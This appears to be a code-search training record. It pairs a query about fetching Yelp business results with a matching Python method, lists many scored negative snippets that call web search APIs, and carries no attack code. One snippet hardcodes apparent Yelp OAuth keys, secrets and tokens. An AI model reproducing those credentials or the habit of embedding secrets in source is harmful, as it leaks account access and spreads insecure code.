(TLV.kTLVType_State, TLV.M3),\n (TLV.kTLVType_EncryptedData, tmp)\n ])\n\n # 12) send to accessory\n conn.request('POST', '/pair-verify', request_tlv, headers)\n resp = conn.getresponse()\n response_tlv = TLV.decode_bytes(resp.read())\n\n #\n # Post Step #4 verification (page 51)\n #\n if TLV.kTLVType_Error in response_tlv:\n 
error_handler(response_tlv[TLV.kTLVType_Error], \"verification\")\n assert TLV.kTLVType_State in response_tlv\n assert response_tlv[TLV.kTLVType_State] == TLV.M4\n\n # calculate session keys\n hkdf_inst = hkdf.Hkdf('Control-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n controller_to_accessory_key = hkdf_inst.expand('Control-Write-Encryption-Key'.encode(), 32)\n\n hkdf_inst = hkdf.Hkdf('Control-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n accessory_to_controller_key = hkdf_inst.expand('Control-Read-Encryption-Key'.encode(), 32)\n\n return controller_to_accessory_key, accessory_to_controller_key",
"def login(self):",
"def authenticate_spotify_api(SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET):\r\n auth_manager = SpotifyClientCredentials(client_id = SPOTIPY_CLIENT_ID, \r\n client_secret=SPOTIPY_CLIENT_SECRET)\r\n \r\n return spotipy.Spotify(auth_manager=auth_manager)",
"def api_auth():\n form = request.get_json(force=True)\n userdata = None\n if form['register']:\n userdata = userProvider.register_user(\n form['username'].encode('utf8'),\n form['password'].encode('utf8')\n )\n else:\n userdata = userProvider.load_authenticated_user(\n form['username'].encode('utf8'),\n form['password'].encode('utf8')\n )\n if userdata:\n user = userProvider.userdata_to_user(userdata)\n flask_login.login_user(user)\n return \"true\"\n raise Exception(\"No user loaded\")"
] | [
"0.7194135",
"0.6754284",
"0.6635698",
"0.65901494",
"0.65472263",
"0.65440655",
"0.6510905",
"0.64644027",
"0.64317477",
"0.6324179",
"0.6274898",
"0.6266883",
"0.6257447",
"0.62521726",
"0.6238254",
"0.6219152",
"0.62120575",
"0.61796516",
"0.6170831",
"0.615797",
"0.6153606",
"0.6136933",
"0.6130101",
"0.6128051",
"0.61126316",
"0.6107248",
"0.61066324",
"0.60973",
"0.60969853",
"0.60941",
"0.6088811",
"0.60719377",
"0.6061616",
"0.6060318",
"0.6036018",
"0.6031797",
"0.6027031",
"0.6021748",
"0.6020879",
"0.60204345",
"0.60059136",
"0.6003962",
"0.6003253",
"0.59936655",
"0.5969332",
"0.5958109",
"0.59557736",
"0.59530914",
"0.59518397",
"0.5944707",
"0.59283024",
"0.59186363",
"0.58865273",
"0.58865273",
"0.5882823",
"0.58808255",
"0.5879482",
"0.5878938",
"0.58779144",
"0.587716",
"0.5874256",
"0.5871344",
"0.5871059",
"0.58655065",
"0.5858993",
"0.5856449",
"0.58512455",
"0.5847875",
"0.5842699",
"0.58403003",
"0.5830978",
"0.5829475",
"0.58265257",
"0.58212334",
"0.58139694",
"0.58135885",
"0.5809314",
"0.5808096",
"0.5807546",
"0.58065236",
"0.57978255",
"0.579713",
"0.5789449",
"0.57807046",
"0.57800525",
"0.57793987",
"0.5770093",
"0.57671666",
"0.5765567",
"0.57648075",
"0.57526594",
"0.5749355",
"0.5748046",
"0.5747278",
"0.5741972",
"0.5739011",
"0.57380474",
"0.5736054",
"0.5726738",
"0.5725471",
"0.572064"
] | 0.0 | -1 |
bridge the connection between the Yelp API and the get_results and get_search_parameters functions. Returns one result at a time, since we expect only the top result per name searched | def main(self, name):
api_results = []
params = self.get_search_parameters(name)
api_results.append(self.api_connect(params))
time.sleep(1.0)
key = api_results[0]['businesses'][0]
business_information = [key['name'], self.phone_number_organizer(key), key['rating'],\
key['review_count']]
return business_information | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def query_api(term, location):\n response = search(term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print 'No businesses for {0} in {1} found.'.format(term, location)\n return\n\n business_id = businesses[0]['id']\n \n print '{0} businesses found, querying business info for the top result \"{1}\" ...'.format(\n len(businesses),\n business_id\n )\n \n response=[]\n for biz in range(len(businesses)):\n response.append(get_business(businesses[biz]['id']))\n #response = get_business(business_id)\n return response",
"def query_api(term, location, search_limit):\n\n response = search(term, location, search_limit)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'\\nNo businesses for {} in {} found.\\n'.format(term, location))\n return\n\n business_id = businesses[0]['id']\n\n print(u'\\n{} businesses found, querying business info for the top result \"{}\" ...\\n'.\n format(len(businesses), business_id))\n\n biz_response = get_business(business_id)\n\n print(u'\\nResult for business \"{}\" found:\\n'.format(business_id))\n\n pprint.pprint(biz_response, indent=2)\n\n reviews_response = get_reviews(business_id)\n\n print(u'\\nReviews for business \"{}\" found:\\n'.format(business_id))\n\n pprint.pprint(reviews_response, indent=2)",
"def get_search_results(url_params):\n categories = url_params['categories']\n radius = url_params['radius']\n key = categories + '|' + radius\n\n # Check if data already in memory\n print 'Checking cached Yelp data.'\n data = YELP_API_RESULTS.get(key)\n if not data:\n print 'New search. Not cached yet.'\n YELP_API_RESULTS[key] = {}\n else:\n # Check that data has search results\n search_results_exist = data.get('search_results')\n print 'Search Results Exist: %s' % bool(search_results_exist)\n # Check that cache hasn't expired\n cache_valid = data.get('cache') > time.time()\n print 'Cache_valid: %s' % bool(cache_valid)\n\n # Boolean to determine if new search performed\n perform_new_search = not (data and search_results_exist and cache_valid)\n if perform_new_search:\n print 'Getting new Yelp data'\n YELP_API_RESULTS[key]['search_results'] = yelpapi.search(url_params)\n YELP_API_RESULTS[key]['cache'] = time.time() + CACHE_EXPIRATION\n\n time_to_expiration = YELP_API_RESULTS[key]['cache'] - time.time()\n print 'Time to cache expiration: %s' % (time_to_expiration)\n return YELP_API_RESULTS[key]['search_results']",
"def _search(self,\n limit=None,\n offset=None,\n format=None,\n version=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n if not version:\n version = self.version\n if version == 1:\n url = self.QUERY_URL.format(\n search_type='Web',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format='json')\n # Need to find the optimal procedure for this\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingWebException(\"[Error] Code:%s, Error:%s\" % (\n res.status_code,\n res.text))\n if version == 2:\n json_results = _bing_search_v2.search_api_v2_dict(search_text=self.query,\n api_key=self.api_key,\n offset=offset,\n limit=limit)\n json_results = json_results.get('d', list())\n if json_results:\n json_results = json_results.get('results', list())\n packaged_results = list()\n packaged_results = [make_dict(result=single_result_json)\n for single_result_json in json_results]\n return packaged_results",
"def getResults():",
"def search(self, name=None):\r\n params = base.get_params(('name', ), locals())\r\n request = http.Request('GET', self.get_url(), params)\r\n\r\n return request, parsers.parse_json",
"def search_yelp(params):\n url = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + os.environ['YELP_KEY']}\n resp = requests.get(url=url, params=params, headers=headers)\n responses = resp.json()\n return responses",
"def get(self):\n\n self.counter = count(1)\n arguments = {}\n for arg_name in ('term', 'page', 'page_width', 'callback'):\n arg_value = self.get_argument(arg_name, None, True)\n if arg_value is not None:\n arguments[arg_name] = arg_value.encode('utf-8')\n\n self.jsonp_callback = arguments.pop('callback', None)\n\n if 'term' not in arguments:\n return self._empty_answer()\n arguments['term'] = self._clean_term(arguments['term'])\n if not arguments['term']:\n return self._empty_answer()\n\n http_client = AsyncHTTPClient()\n url = \"{0}/{1}/?{2}\"\n for search_type in self.response.keys():\n request = HTTPRequest(\n url.format(self.api_url, search_type, urlencode(arguments)),\n method='GET',\n request_timeout=3,\n )\n http_client.fetch(\n request,\n callback=partial(self._handle_request, search_type)\n )",
"def get_results():\n # store info in a dictionary {name -> shortname}\n res = {}\n session = requests.Session()\n handle_url('http://www.gocomics.com/features', session, res)\n handle_url('http://www.gocomics.com/explore/editorial_list', session, res)\n handle_url('http://www.gocomics.com/explore/sherpa_list', session, res)\n save_result(res, json_file)",
"def search(self, query, offset):\n \n def parse_flickr_json(site, query, results):\n \"\"\"Create a OpenSearch Response from Flickr results.\n \n Flickr's search API returns results in JSON format. This function simply loads the JSON into memory and creates an equivalent representation that is OpenSearch compliant.\n \n Parameters:\n \n * site (str): search engine name\n * query (str): query search terms (n.b. not a OpenSearch Query object)\n * results (dict): results from service\n \n Returns:\n \n * puppy.model.OpenSearch.Response\n \n \"\"\"\n response = Response()\n response.version = 'json'\n response.feed.setdefault('title', \"{0}: {1}\".format(site, query))\n response.feed.setdefault('link', results['link'])\n response.feed.setdefault('description', \"Search results for '{0}' at {1}\".format(query, site))\n response.namespaces.setdefault(\"opensearch\", \"http://a9.com/-/spec/opensearch/1.1/\")\n try:\n response.feed.setdefault(\"opensearch_totalresults\", int(results['total']))\n response.feed.setdefault(\"opensearch_itemsperpage\", int(results['perpage']))\n response.feed.setdefault(\"opensearch_startindex\", int(results['page']))\n except KeyError:\n response.feed.setdefault(\"opensearch_totalresults\", 0)\n response.feed.setdefault(\"opensearch_itemsperpage\", 0)\n response.feed.setdefault(\"opensearch_startindex\", 0)\n \n if 'photo' in results:\n for result in results['photo']:\n # Links need to be created from several fields - see the Flickr API for a detailed explanation\n \n try:\n resultLink = \"http://www.flickr.com/photos/{0}/{1}\".format(result['owner'], result['id'])\n resultThumbnail = \"http://farm{0}.static.flickr.com/{1}/{2}_{3}_t.jpg\".format(result['farm'], result['server'], result['id'], result['secret'])\n resultSummary = \"Photo result for '{0}' from {1}\".format(query, site)\n response.entries.append({'title': result['title'], 'link': resultLink, 'summary': resultSummary, 'thumbnail': resultThumbnail})\n except Exception, e:\n print \"Skipping a result due to: {0} \\nWhen parsing a result from: {1}\\n\".format(e, results['link'])\n continue\n \n return response\n\n\t# Try and get the API key from config, if it's not there raise an API Key error - the application will have to deal with this\n try:\n appId = self.service.config[\"flickr_api_key\"]\n except KeyError:\n raise ApiKeyError(\"Flickr\", \"flickr_api_key\")\n\n # Now that an API key has been supplied try to get results from the search engine itself\n try: \n pos = self._origin() + offset\n appId = self.service.config[\"flickr_api_key\"]\n url = \"http://api.flickr.com/services/rest/?method=flickr.photos.search&api_key={0}&text={1}&sort={2}&safe_search={3}&media={4}&per_page={5}&page={6}&format=json&nojsoncallback=1\".format(appId, urllib2.quote(query.search_terms), self.sortBy, self.safeSearch, self.mediaType, self.resultsPerPage, pos)\n \n if (self.bbox):\n url += \"&bbox={0}\".format(self.bbox) \n data = urllib2.urlopen(url).read()\n results = json.loads(data)\n results['photos'].setdefault(u'link', url)\n return parse_flickr_json('Flickr', query.search_terms, results['photos'])\n\n # urllib2 - this catches http errors due to the service being down, lack of a proxy etc\n except urllib2.URLError, e:\n raise SearchEngineError(\"Flickr\", e, errorType = 'urllib2', url = url)\n\n # Check for a type error for offset or resultsPerPage\n except TypeError, e:\n note = \"Please ensure that 'offset' and 'resultsPerPage' are integers if used\"\n if isinstance(offset, int) == False:\n raise 
SearchEngineError(\"Flickr\", e, note = note, offsetType = type(offset))\n\n if isinstance(self.resultsPerPage, int) == False:\n raise SearchEngineError(\"Flickr\", e, note = note, resultsPerPageType = type(self.resultsPerPage))\n\n raise SearchEngineError(\"Flickr\", e, note = note)\n\t \n # Catch Attribute error which deals with unexpected none type for the objects the wrapper uses and other associated issues\n except AttributeError, e:\n raise SearchEngineError(\"Flickr\", e, url = url)",
"def fetch(self, **kwargs):\n api_seid = self.engine_info['GOOGLE_SITE_SEARCH_SEID']\n page = kwargs.get('page', 1)\n if not page:\n page = 1\n elif page > self.max_pages:\n page = self.max_pages\n start = ((page - 1) * self.max_results_per_page) + 1\n num = kwargs.get('num', self.max_results_per_page)\n if not num:\n num = self.max_results_per_page\n try:\n response = self.connection.cse().list(\n q=kwargs.get('query', ''), cx=api_seid,\n num=self._get_num_results(num),\n start=start).execute()\n logger.debug(\"Fetched search results for search term '%s'.\" % (kwargs.get('query', '')))\n except apiclient.errors.HttpError as e:\n logger.exception(e)\n raise\n return response",
"def api_connect(self, params):\n\t\tconsumer_key = \"XwD3f3Yoe2GcjqXSd5kRkA\"\n\t\tconsumer_secret = \"VtZMCNmBNEardBkIXo-RU7De-wU\"\n\t\ttoken = \"JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ\"\n\t\ttoken_secret = \"S4XUSKiIcUCYnlC3q7FYgUC47co\"\n\t\t\n\t\tsession = rauth.OAuth1Session(consumer_key = consumer_key,\n\t\tconsumer_secret = consumer_secret,\n\t\taccess_token = token,\n\t\taccess_token_secret = token_secret,\n\t\t)\n\t\t\n\t\trequest = session.get(\"http://api.yelp.com/v2/search\",params=params)\n\t\t\n\t\tdata = request.json()\n\t\tsession.close()\n\t\t\n\t\treturn data",
"def get(self, search_words, language, result_type):\n consumer_key = config.twitter_api_credentials[\"consumer_key\"]\n consumer_secret = config.twitter_api_credentials[\"consumer_secret\"]\n access_token = config.twitter_api_credentials[\"access_token\"]\n access_token_secret = config.twitter_api_credentials[\"access_token_secret\"] \n \n auth = tweepy.OAuthHandler(consumer_key, consumer_secret); \n auth.set_access_token(access_token, access_token_secret);\n api = tweepy.API(auth, wait_on_rate_limit=True) ; \n \n #input_params = ns.payload\n #search_words = input_params['search_words'] \n #language = input_params['language'] # Language code (follows ISO 639-1 standards)\n #until_date = input_params['until_date']\n #result_type = input_params['result_type'] until=until_date\n\n try:\n results = tweepy.Cursor( api.search, q=search_words, lang=language, result_type = result_type).items(10) \n out = { tweet.user.screen_name: { \"followers_count\": tweet.user.followers_count, \\\n \"location\": tweet.user.location ,\"favorite_count\":tweet.favorite_count,\"text\": tweet.text} for tweet in results }\n sorted_keys = {k:v[\"followers_count\"] for (k,v) in out.items()}\n sorted_keys = sorted(sorted_keys, key=sorted_keys.__getitem__, reverse=True)\n out = {k:out[k] for k in sorted_keys}\n return out\n except tweepy.error.TweepError as e:\n return(json.loads(e.response.text)['errors'][0]['message'], 401)",
"def get_query_results(QueryExecutionId=None, NextToken=None, MaxResults=None):\n pass",
"def query_api(term, location):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n\n business_id = businesses[0]['id']\n\n print(u'{0} businesses found, querying business info ' \\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business(bearer_token, business_id)\n\n print(u'Result for business \"{0}\" found:'.format(business_id))\n pprint.pprint(response, indent=2)\n dict_list = []\n for i in response:\n dict_list.append(i)\n print dict_list",
"def search(self, query, maxhits=100):",
"def execute_search(locations, distance, query):\n full_business_list = []\n for engine in [google, yelp]:\n businesses = []\n for lat, lng in locations:\n businesses.extend(engine.search(lat, lng, distance, query))\n # Remove duplicates from API call overlap\n names = set()\n filtered_list = []\n print(time.strftime(\"%Y/%m/%d at %H:%M:%S \") + engine.__name__ + \" \" + str(len(businesses)))\n for business in businesses:\n if business:\n filtered_list.append(business)\n names.add(business.name)\n businesses = filtered_list\n # Calculate low threshold and average ratings\n try:\n low_threshold = min(\n business.rating_count for business in businesses)\n except:\n # go to next item\n continue\n average_rating = sum(\n business.rating for business in businesses) / len(businesses)\n # Convert to 10 point scale\n scale_multiplier = 2\n # Add bayesian estimates to business objects\n for business in businesses:\n business.bayesian = bayesian(business.rating * scale_multiplier,\n business.rating_count,\n low_threshold,\n average_rating * scale_multiplier)\n\n # Add this search engine's list to full business list\n full_business_list.extend(businesses)\n\n return full_business_list",
"def search_unified():\n result_types = flask.request.args.get('result_types').split(',')\n\n # TODO(david): Cache this.\n course_dicts = []\n if 'courses' in result_types:\n courses = sorted(list(m.Course.objects().only('id', 'name',\n '_keywords', 'department_id', 'number')),\n key=lambda c: c.id)\n course_dicts = [{\n 'label': c.id,\n 'name': c.name,\n 'type': 'course',\n 'tokens': c._keywords,\n 'department_id': c.department_id,\n 'number': c.number\n } for c in courses]\n\n friend_dicts = []\n if 'friends' in result_types:\n user = view_helpers.get_current_user()\n if user:\n friends = user.get_friends()\n friend_dicts = [{\n 'label': f.name,\n 'program': f.short_program_name,\n 'type': 'friend',\n 'id': f.id,\n 'pic': f.profile_pic_urls['square'],\n 'tokens': [f.first_name, f.last_name]\n } for f in friends]\n\n prof_dicts = []\n if 'professors' in result_types:\n professors = m.Professor.objects().only('id',\n 'first_name',\n 'last_name',\n 'departments_taught')\n prof_dicts = [{\n 'label': p.name,\n 'departments_taught': p.departments_taught,\n 'type': 'prof',\n 'prof_id': p.id,\n 'name': p.name,\n 'tokens': [p.first_name, p.last_name, 'professor']\n } for p in professors]\n\n return api_util.jsonify({\n 'friends': friend_dicts,\n 'courses': course_dicts,\n 'professors': prof_dicts\n })",
"def query_api(term, location):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n final_result=''\n for i in businesses:\n business_id = i['id']\n # print(u'{0} businesses found, querying business info ' \\\n # 'for the top result \"{1}\" ...'.format(\n # len(businesses), business_id))\n response =get_business(bearer_token, business_id)\n \n\n # print(u'Result for business \"{0}\" found:'.format(business_id))\n return ','.join([str(x['id']) for x in businesses])",
"def processSearchResult(self):",
"def get_apis(self, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass",
"def run_query(search_terms):\n bing_api_key = read_bing_key()\n\n if not bing_api_key:\n raise KeyError(\"Bing Key Not Found\")\n\n # Specify the base url and the service (Bing Search API 2.0)\n root_url = 'https://api.bing.microsoft.com/v7.0/search'\n #search_url = \"https://api.bing.microsoft.com/v7.0/search\"\n service = 'Web'\n\n # Specify how many results we wish to be returned per page.\n # Offset specifies where in the results list to start from.\n # With results_per_page = 10 and offset = 11, this would start from page 2.\n results_per_page = 10\n offset = 0\n\n # Wrap quotes around our query terms as required by the Bing API.\n # The query we will then use is stored within variable query.\n query = \"'{0}'\".format(search_terms)\n\n # Turn the query into an HTML encoded string, using urllib.\n # Use the line relevant to your version of Python.\n query = urllib.parse.quote(query) # Py3\n\n # Construct the latter part of our request's URL.\n # Sets the format of the response to JSON and sets other properties.\n #search_url = \"{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}\".format(root_url, service, results_per_page,offset,query)\n\n headers = {\"Ocp-Apim-Subscription-Key\": bing_api_key}\n params = {\"q\": search_terms, \"textDecorations\": True, \"textFormat\": \"HTML\", \"count\": results_per_page, \"offset\": offset}\n response = requests.get(root_url, headers=headers, params=params)\n response.raise_for_status()\n search_results = response.json()\n\n output_results = []\n keys = [\"webPages\", \"images\", \"videos\"]\n url = {\"webPages\": \"url\", \"images\": \"hostPageUrl\", \"videos\": \"hostPageUrl\"}\n summary = {\"webPages\": \"snippet\", \"images\": \"\", \"videos\": \"description\"}\n for key in keys:\n if key in search_results.keys():\n for result in search_results[key][\"value\"]:\n if key != \"images\":\n output_results.append({\"category\": key, \"title\": result[\"name\"], \"link\": result[url[key]], \"summary\": result[summary[key]]})\n else:\n output_results.append({\"category\": key, \"title\": result[\"name\"], \"link\": result[url[key]], \"summary\": \"None\"})\n return output_results",
"def search_for_books(search_criteria, product_url, headers):\n\tprint \"od api in search_for_books \"\n\tlist_of_books = []\n\tlist_book = []\n\tq = search_criteria\n\tlimit = 300\t\t# 25 by default 300 max\n\toffset = 0\t\t# number of titles to skip\n\tformats = \"\"\n\tsort = \"Author:desc\" \t\t# :desc\n\tlastupdatetime = \"\" \n\tseries = \"\" \n\tsearch_parms = \"?q=%s&limit=%s&offset=0&formats=%s&sort=%s\" % (q, limit, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formats, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t sort)\n\tod_url=\"%s%s\" % (product_url, search_parms)\n\n\tprint \"overdrive url = \", od_url, \"\\n\"\n\tod_url = od_url.replace(' ', '%20')\n\tbook_response = requests.get(od_url, headers=headers)\n\n\tprint \"book search response == \", book_response, \"reason = \", book_response.reason, \"\\n\"\n\tif book_response.status_code == 401:\n\t print \"Patron is not authorize to use this library == \", od_url, \"\\n\"\n\telif book_response.status_code > 201:\n\t\tprint \"Get request failed == \", book_response.reason\n\telif book_response.status_code == 200 or book_response.status_code == 201:\n\t\tprint \"Get request to get the a list of books was successful\", \"\\n\"\n\n\t\tbook_response_data = json.loads(book_response.content)\n\t\tprint \"OverDrive book count == \", book_response_data['totalItems'], \"\\n\"\n\n\t\tif book_response_data['totalItems'] > 0:\n\t\t\tproducts = book_response_data['products']\n\t\t\tfor product in products:\n\t\t\t\tbook_data = {}\t\n\t\t\t\tbook_data['images'] = product['images']['thumbnail']['href']\n\t\t\t\tbook_data['title'] = product['title']\n\t\t\t\tbook_data['author'] = product['primaryCreator']['name']\n\t\t\t\tbook_data['availableToDownload'] = product['links']['availability']['href']\n\t\t\t\tbook_data['id'] = product['id']\n\t\t\t\tbook_data['metadata'] = product['links']['metadata']['href']\n\t\t\t\tbook_data['origin'] = 'ODCOM'\n\t\t\t\tlist_book = [book_data]\n\t\t\t\tlist_of_books.extend(list_book)\n\t\t\t#end for\n\t\t#end if\n\t#end if\n\n\treturn list_of_books",
"def search():\n\n question = request.get_json()\n question = question['questions']\n\n prediction = pipe.run(query=question[0], top_k_retriever=3, top_k_reader=3)\n answer = []\n \n for res in prediction['answers']:\n answer.append(res['answer'])\n\n result = {\"results\":[prediction]}\n return json.dumps(result)",
"def get_results():\n # store info in a dictionary {name -> shortname}\n res = {}\n session = requests.Session()\n handle_url('http://www.creators.com/comics/cat-seeall.html', session, res)\n save_result(res, json_file)",
"def perform_search(search: str, max_records: int) -> List[str]:\n results = []\n url = \"%s?format=json&action=query&list=search&srlimit=%d&srsearch=%s\" % (WIKIDATA_URL, max_records, quote(search))\n # Perform request\n print_debug(\"Sending GET %s\" % url)\n response = requests.get(url)\n data = response.json()\n print_debug(\"%s -> %d\" % (url, response.status_code))\n print_debug(\"%s\" % response.text)\n # Get search results\n records = data[\"query\"][\"search\"]\n # Iterate over records\n for record in records:\n results.append(record[\"title\"])\n return results",
"def search(bearer_token, term, location):\n\n url_params = {\n 'term': term.replace(' ', '+'),\n 'location': location.replace(' ', '+'),\n 'limit': SEARCH_LIMIT\n }\n return request_from_yelp(API_HOST, SEARCH_PATH, bearer_token, url_params=url_params)",
"def search_api():\n query = request.args.get(\"url\", \"\", type=str)\n return_html = str_to_bool(request.args.get(\"result\", \"false\", type=str))\n show_stats = str_to_bool(request.args.get(\"stats\", \"false\", type=str))\n info = str_to_bool(request.args.get(\"info\", \"true\", type=str))\n check_all = str_to_bool(request.args.get(\"checkall\", \"false\", type=str))\n favicon = str_to_bool(request.args.get(\"favicon\", \"false\", type=str))\n return_opml = str_to_bool(request.args.get(\"opml\", \"false\", type=str))\n force_crawl = str_to_bool(request.args.get(\"force\", \"false\", type=str))\n check_feedly = str_to_bool(request.args.get(\"feedly\", \"true\", type=str))\n skip_crawl = str_to_bool(request.args.get(\"skip_crawl\", \"false\", type=str))\n\n g.return_html = return_html\n\n url: URL = validate_query(query)\n\n start_time = time.perf_counter()\n\n search_runner = SearchRunner(\n db_client=db_client,\n check_feedly=check_feedly,\n force_crawl=force_crawl,\n check_all=check_all,\n skip_crawl=skip_crawl,\n )\n feed_list: List[CustomFeedInfo] = search_runner.run_search(url)\n stats = search_runner.crawl_stats\n\n search_time = int((time.perf_counter() - start_time) * 1000)\n stats[\"search_time\"] = search_time\n app.logger.info(\"Ran search of %s in %dms\", url, search_time)\n\n if not feed_list and no_response_from_crawl(stats):\n raise NotFoundError(f\"No Response from URL: {url}\")\n\n result: Dict = {}\n if feed_list:\n try:\n kwargs = {}\n if not info:\n kwargs[\"only\"] = [\"url\"]\n if not favicon:\n kwargs[\"exclude\"] = [\"favicon_data_uri\"]\n\n feed_schema = ExternalFeedInfoSchema(many=True, **kwargs)\n\n feed_list = sorted(feed_list, key=lambda x: x.score, reverse=True)\n dump_start = time.perf_counter()\n result = feed_schema.dump(feed_list)\n dump_duration = int((time.perf_counter() - dump_start) * 1000)\n app.logger.debug(\n \"Schema dump: feeds=%d duration=%dms\", len(result), dump_duration\n )\n stats[\"dump_time\"] = dump_duration\n except ValidationError as err:\n app.logger.warning(\"Dump errors: %s\", err.messages)\n abort(500)\n\n if show_stats:\n result = {\"feeds\": result, \"search_time_ms\": search_time, \"crawl_stats\": stats}\n\n if return_html:\n return render_template(\n \"results.html\",\n feeds=feed_list,\n json=get_pretty_print(result),\n url=url,\n stats=get_pretty_print(stats),\n )\n elif return_opml:\n opml_result = output_opml(feed_list).decode(\"utf-8\")\n return Response(opml_result, mimetype=\"text/xml\")\n\n return jsonify(result)",
"def query_api(term, location, RADIUS_SIZE, RESTRICTED):\n response = search(API_KEY, term, location, 0, RADIUS_SIZE)\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n numFound = 0\n while len(businesses) >= 50 + numFound:\n numFound += 50\n response = search(API_KEY, term, location, numFound, RADIUS_SIZE)\n more_businesses = response.get('businesses')\n if more_businesses is not None:\n businesses.extend(more_businesses)\n\n names = []\n contacts = []\n addresses = []\n urls = []\n categories = []\n city = []\n state = []\n zipcode = []\n radius = []\n #Create a list from the names\n #Cross reference with restricted and delete elements that are matching\n for i in range(0, len(businesses)):\n not_matched = True\n for j in range (0, len(RESTRICTED)):\n if(businesses[i]['name'] == RESTRICTED[j].strip('\\n')):\n not_matched = False\n if(not_matched and (businesses[i]['distance']) < RADIUS_SIZE):\n names.append(businesses[i]['name'])\n radius.append(businesses[i]['distance'] / 1600)\n contacts.append(businesses[i]['display_phone'])\n addresses.append(businesses[i]['location']['address1'])\n city.append(businesses[i]['location']['city'])\n state.append(businesses[i]['location']['state'])\n zipcode.append(businesses[i]['location']['zip_code'])\n categories.append(businesses[i]['categories'][0]['title'])\n urls.append(businesses[i]['url'])\n list_restaurants = open('target_restaurants.txt', 'w')\n for x in range(0, len(names)):\n try:\n list_restaurants.write(\"%s\\t\" % names[x])\n list_restaurants.write(\"%s\\t\" % contacts[x])\n list_restaurants.write(\"%s\\t\" % radius[x])\n list_restaurants.write(\"%s\\t\" % addresses[x])\n list_restaurants.write(\"%s\\t\" % city[x])\n list_restaurants.write(\"%s\\t\" % state[x])\n list_restaurants.write(\"%s\\t\" % zipcode[x])\n list_restaurants.write(\"%s\\t\" % categories[x])\n list_restaurants.write(\"%s\\n\" % urls[x])\n except UnicodeEncodeError:\n continue\n\n print(\"Businesses found and printed to target_restaurants.txt file\")",
"def query_and_fetch(query, top_n=12):\n global url_details, url_text\n print('Query: ' + query + '; Top N: ' + str(top_n))\n url_details = []\n url_text = []\n driver = None\n bad_request = False\n try:\n driver = Fetcher.get_selenium_driver()\n driver.get('https://api.duckduckgo.com/?q=' + query + '&kl=wt-wt')\n except:\n print('An error occurred while searching query: ' + query)\n Fetcher.close_selenium_driver(driver)\n Fetcher.search_driver = None\n bad_request = True\n finally:\n try:\n if not bad_request:\n results = driver.find_elements_by_class_name('result__a')\n result_size = len(results)\n print('Result Size: ' + str(result_size))\n while result_size > 0 and len(url_details) < top_n:\n urls = []\n for element in results:\n new_url = element.get_attribute('href')\n # TODO: Filter URLs if required\n print(new_url)\n urls.append(new_url)\n\n fetched_result = Fetcher.fetch_multiple(urls, top_n)\n\n for fetched_data in fetched_result:\n if not fetched_data[1] or len(fetched_data[1].strip()) == 0:\n continue\n details = dict()\n details['url'] = fetched_data[0]\n details['html'] = fetched_data[1]\n details['title'] = fetched_data[2]\n details['label'] = predict(fetched_data[3])\n url_details.append(details)\n url_text.append(fetched_data[3])\n if len(url_details) == top_n:\n break\n\n # Infinite Scroll\n if len(url_details) < top_n:\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n results = driver.find_elements_by_class_name('result__a')\n results = results[result_size:]\n result_size = len(results)\n print('Moved to Next Page. Result Size: ' + str(result_size))\n except:\n print('An error occurred while searching query: '+ query + ' and fetching results')\n #finally:\n # if driver is not None:\n # Fetcher.close_selenium_driver(driver)\n setattr(flask.current_app, 'url_text', url_text)\n print('Search Completed')\n return url_details",
"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Video',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingVideoException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [VideoResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def suggest(self, name, query, count=SUGGESTION_COUNT, params=None):\n url = f\"{self.suggestions_url}/suggestions/api/4_1/rs/suggest/{name}\"\n data = {\"query\": query, \"count\": count}\n if params:\n data.update(params)\n response = self._post(url, data)\n return response[\"suggestions\"]",
